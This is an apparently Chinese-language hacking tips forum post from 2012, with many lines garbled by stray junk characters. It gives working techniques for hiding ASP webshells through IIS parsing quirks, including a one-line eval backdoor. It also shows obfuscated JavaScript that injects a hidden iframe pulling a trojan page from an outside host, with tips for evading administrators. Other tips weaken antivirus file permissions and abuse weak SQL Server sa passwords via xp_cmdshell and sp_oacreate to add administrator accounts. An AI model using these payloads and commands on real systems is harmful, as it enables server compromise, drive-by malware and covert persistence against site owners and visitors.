2 L, ?4 u* q6 c' f1、建立非标准目录:mkdir images..\
$ R, S3 ]. L) K. M7 @1 I! }拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp6 o- m d. z) I
通过web访问ASP木马:http://ip/images../news.asp?action=login
. m9 S" o5 m' z. q+ ]/ t1 {- _9 y4 M如何删除非标准目录:rmdir images..\ /s: i# N8 Y" G8 I; r6 L9 H% @+ M
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: V; W" a$ ?6 }, R6 X" c* z- d vmkdir programme.asp+ ]$ q. I( `* J. ]' C$ v, b
新建1.txt文件内容:<!--#include file=”12.jpg”-->& P' ~8 K( Z, h
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* }0 M3 E, Q+ g. Y2 f; u. rattrib +H +S programme.asp, P3 r# c4 o" M; n# N% b \2 [
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. f2 x' Y M, K+ {- ~' e
" [ B. T3 y e$ q1 ?- j& | o+ J54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
( U5 A+ P( N/ ^: B! S% L然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。' _. q) Z6 L; Y: \
; ?- T' a' r3 b& `) q5 Z
55、JS隐蔽挂马
G3 z2 F# {- H1./ _% J6 Z4 B7 s
var tr4c3="<iframe src=ht";
3 C4 @. {: ^- \" {& xtr4c3 = tr4c3+"tp:/";4 r9 b, U; B2 I, X5 F
tr4c3 = tr4c3+"/ww";
. h0 K7 P$ c6 i/ s/ F" t4 c- ltr4c3 = tr4c3+"w.tr4"; P5 g8 ]* h: I9 O/ ^
tr4c3 = tr4c3+"c3.com/inc/m";
+ v0 G* y, l( i8 |( qtr4c3 = tr4c3+"m.htm style="display:none"></i";
; @; Y) l9 ~* S7 W# D+ Htr4c3 =tr4c3+"frame>'";+ J9 Y4 K# Z! Z8 i; R, b! s/ P$ j; |
document.write(tr4c3);/ h- ~5 s3 H6 t+ \+ S* _% A
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
, n. m! ~/ E; P* L2 ~$ d6 q; X7 T0 |# i+ {8 H
2.
; f2 ~( m7 {( e+ ?0 V A转换进制,然后用EVAL执行。如4 `8 c6 S" r: X
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");6 v( h) S$ a% ?6 s9 y/ B: f
不过这个有点显眼。4 q' t6 Q8 p; X! X. j0 L
3.& O3 N; h0 T2 L( T9 ^# @
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
/ Y" o/ y5 A8 b- \/ ^2 B最后一点,别忘了把文件的时间也修改下。6 r" n& O2 h6 t- @/ w8 i, [
) g) q+ S+ z( e% e4 I1 h0 M. ]5 c56.3389终端入侵常用DOS命令
5 O9 J$ Y$ X/ ftaskkill taskkill /PID 1248 /t
" @- Q0 Y5 ?- j6 @- z4 I: `) C7 _( C- r j; b4 G# U
tasklist 查进程3 R& a# i# X1 n& Y: G, x
6 X% n5 X5 u; Ucacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
3 n( j$ f4 H% Aiisreset /reboot) e/ E% p7 E Z1 O# {
tsshutdn /reboot /delay:1 重起服务器4 q0 U) ~8 b) d
- I4 y6 A# Q! N: r; C# p0 flogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
* A( s& p' ^2 S2 |6 R' |
6 U- x# Q3 }* K1 Wquery user 查看当前终端用户在线情况3 j( S2 |0 Z3 A& f2 |7 N* d2 b0 B
6 }9 q4 ]3 P4 E w9 Q
要显示有关所有会话使用的进程的信息,请键入:query process *
, W# S3 c8 G! O a O8 B& O/ a7 K. x" g1 L
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 k8 g8 F( W/ |* n) S
! F' ?6 \: @) n
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 B7 B/ z* | O
. m0 l* k% l7 x9 v& }2 D. @9 }要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
- O# y! J* g8 a# D0 R
( p2 x1 r3 K, i命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ \/ l7 e" c% N" G1 U5 q+ d
) q5 p' s. q$ n9 Y% i# Z0 p2 w命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
8 y- w' l r6 y/ Z n+ Q2 j" K$ y. L$ C0 c0 E9 R
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。- y2 ~7 l9 q0 I# V2 W4 A2 h8 M0 D
; \6 r- v+ o$ J1 U' u命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 H; e4 d( e5 h: e6 Z6 ]
_/ z! M9 c5 [; ~0 P! t56、在地址栏或按Ctrl+O,输入:
% V) R4 l1 X& Yjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) U; U1 s: ]2 a5 c
C$ f1 D: o! A/ A. p) {源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 {" J3 Q+ s( L; Z9 ~" I2 w/ K" W% H. G# }$ e
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
/ z& k$ f V1 m/ g用net localgroup administrators是可以看到管理组下,加了$的用户的。9 l! u+ c+ `* y) [* s7 J+ Y( n/ H
7 b- R& b$ d; T+ y4 m58、 sa弱口令相关命令
* y& o% B/ B+ v8 C# R0 D U, }$ U
1 C% m& k0 r; ^& G) m4 Y" k一.更改sa口令方法:, y- z* F8 Y2 Q, ?; t
用sql综合利用工具连接后,执行命令: J6 ` b5 `/ w+ A
exec sp_password NULL,'20001001','sa'9 j0 Z7 ]/ m1 p% y! v& o! F7 r$ `
(提示:慎用!)& n; S; b) ~1 ~. t
9 `+ d' \1 K0 x$ J* s
二.简单修补sa弱口令.) G4 d" d/ n h
l9 R$ f; G, v% y. z5 ~, o
方法1:查询分离器连接后执行:' ~% `0 W& {3 C. `- l' U
if exists (select * from
* I0 H( g9 q: R/ ^' N/ ]dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* d. A' m1 [+ A$ |4 M w. k: x, OOBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 E9 |; E6 N, O
% ?) D5 j3 ~2 N# O( h
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' `9 s9 J2 b- G! K4 Y3 N
2 ~ r) Q/ f; m+ \GO
& h/ }# f h6 w. X6 \' I: T0 g, q# p0 G/ m: m) o' N: B& r3 R1 l6 t8 u2 }
然后按F5键命令执行完毕
* K+ c# m) N7 f2 ]/ E% ?3 E
/ o7 H) A2 O1 ]- O a方法2:查询分离器连接后
% {$ R4 k, a; y- R3 |# y第一步执行:use master
" w1 o# e9 Q& r, f) }: v第二步执行:sp_dropextendedproc 'xp_cmdshell'* o! {, g/ B: V2 g. D/ O
然后按F5键命令执行完毕
: J, E5 ?! x B; Y* D, s; C u, ~) E8 s* J) S! K
% u8 d9 Y# u$ f- S* _
三.常见情况恢复执行xp_cmdshell.
) h) q! C; e' y! N% Q* b( \/ r
# a" o) b1 H ]2 \% V' s' F( g. e, M$ T( M1 o3 y
1 未能找到存储过程'master..xpcmdshell'.
' A, O' R8 L0 M 恢复方法:查询分离器连接后," J3 ]* X7 }+ q; b
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 |4 g, g& @! A. g- O9 d2 o2 }第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
n7 g7 |2 @' p& U5 f0 m t然后按F5键命令执行完毕. X) v- V0 I0 I
. j! J( E! [/ j Y0 v' q2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# k; N# b( n; u) o3 B3 c恢复方法:查询分离器连接后,7 R l3 U. Z( w
第一步执行:sp_dropextendedproc "xp_cmdshell" n& L4 } \4 v# {1 H
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( F: K4 o9 f$ A3 d然后按F5键命令执行完毕
7 v9 E Q. D) A& h5 M' O8 \+ s
2 O2 v- g6 ^0 O2 C0 ^ v) n/ ]3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)* J0 e. E7 j0 z2 g
恢复方法:查询分离器连接后,
& Y6 K. Q) l6 B第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 l- V0 _1 d! p) C
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' . K" ?8 A' _: W* z1 B2 }
然后按F5键命令执行完毕# B& E# B8 f ]1 Q/ m1 }" W, ]1 Z
: r3 x* \0 f. b0 N; v* a8 V" ?# D
四.终极方法.' y- P# d' ?7 U8 O; k
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:3 ~% L+ k6 J+ C4 d7 M
查询分离器连接后,
9 V* V, z4 ]/ j b7 V; g2000servser系统:
+ _/ w/ t0 M* C! R% e4 \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'3 n' T2 F3 g7 w, s
# v+ o8 w& [& d4 K( j/ Q( `
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# m) r. S6 i( W/ X2 t* i
- z3 H' A5 @' _: ?6 _4 g
xp或2003server系统:4 c8 f; G1 I1 r S
1 z/ x/ ~/ \9 _0 c2 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'3 x J+ A! ~) z6 C( W( ~
" |7 G7 Q8 }; h0 u! gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 g$ D s# c3 X
|
发表于 2012-9-15 14:51:03
收藏
支持
反对